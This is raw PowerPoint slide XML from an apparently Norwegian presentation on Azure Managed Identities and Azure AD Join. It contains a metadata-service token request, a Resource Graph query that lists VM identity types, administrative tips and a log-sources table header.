                <a:effectLst/>
              </a:rPr>
              <a:t>GET:  'http://169.254.169.254/metadata/identity/oauth2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>token?api-version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>=2018-02-01&amp;resource=https://management.azure.com/' HTTP/1.1 Metadata: true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="19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nb-NO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2B55C8-9723-4E3D-9A46-E314768B5238}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5854846" y="972779"/>
            <a:ext cx="6096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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example: Azure Resource Graph: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>// SAMI = System-assigned Managed Identity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="596174"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>// UAMI = User-assigned Managed Identity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="596174"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Sjekker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> om VM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>eller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> VMSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>har</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> SAMI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>eller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> UAMI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="596174"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>resources</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="596174"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>|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 join kind=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4284AE"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>leftouter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="596174"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>resourcecontainers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 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="596174"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>|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 where type==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>microsoft.resources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>/subscriptions'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 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="596174"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>|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 project </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>subscriptionName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=name, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>subscriptionId</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="596174"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>)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 on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>subscriptionId</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="596174"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>|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 where type =~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>microsoft.compute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>virtualmachines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>"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 or</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="596174"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>type =~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>microsoft.compute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>virtualMachineScaleSets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="596174"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>|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 extend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>identityType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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>identity.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4284AE"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="596174"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>|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 extend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>hasManagedIdentity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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4284AE"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>iff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>(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identity == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>""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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>"No"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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>"Yes"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>)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,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="596174"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>isSystemAssignedEnable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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4284AE"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>iff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>identityType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 contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>SystemAssigned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>"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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>"Yes"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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7CC379"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>"No"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="596174"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6B7C8B"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>|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 project </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>subscriptionId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, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="596174"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>subscriptionName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, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="596174"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>name, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="596174"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>resourceGroup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, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="596174"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>identityType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, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="596174"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>hasManagedIdentity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="596174"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>isSystemAssignedEnable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="596174"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400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A9C74DDA-0577-4245-9AAE-CBFD31E46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499" y="984430"/>
            <a:ext cx="6084008" cy="47421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66A8F9-F8F2-428D-BDE3-A17A0A827E16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6479005" y="5745079"/>
            <a:ext cx="437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u="sng" dirty="0"/>
              <a:t>Remember to turn on Azure AD Diagnostics logging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9942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4D80DA-ECE0-4461-955E-6BD2D3B70227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2051050" y="260875"/>
            <a:ext cx="9551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b="1" dirty="0"/>
              <a:t>Managed Identities and Azure AD Join</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b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AC413AF-CB46-41C3-A839-245552650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4584" y="1313172"/>
            <a:ext cx="4102437" cy="501076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Azure AD Join supported for Linux  and Windows (Server 2019 and later)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Virtual Machine Administrator or User logon access required to logon machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Dsregcmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> /status and /leave good commands to remember</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Remember to exclude “Azure Windows VM Sign-in” from Conditional Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="171717"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Supported by Azure Bastion via RDP/SSH with UPN: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>AzureAD\john@contoso.com</a:t>
            </a:r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nb-NO" sz="2000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F7A285E4-96D1-4BE0-877A-231034E8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735" y="1386009"/>
            <a:ext cx="6281934" cy="206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b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Logs and log sources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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4CBE4946-22D8-491A-8833-5084998F8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40413"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="987353" y="1432322"/>
          <a:ext cx="10193232" cy="4745078"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="2548308">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3680454339"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2548308">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="897638882"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2548308">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="898253443"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2548308">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2403709729"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="464380">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg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Audit log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1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg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Category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1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg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Enabled as standard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1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg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Retention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81576"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="430293">
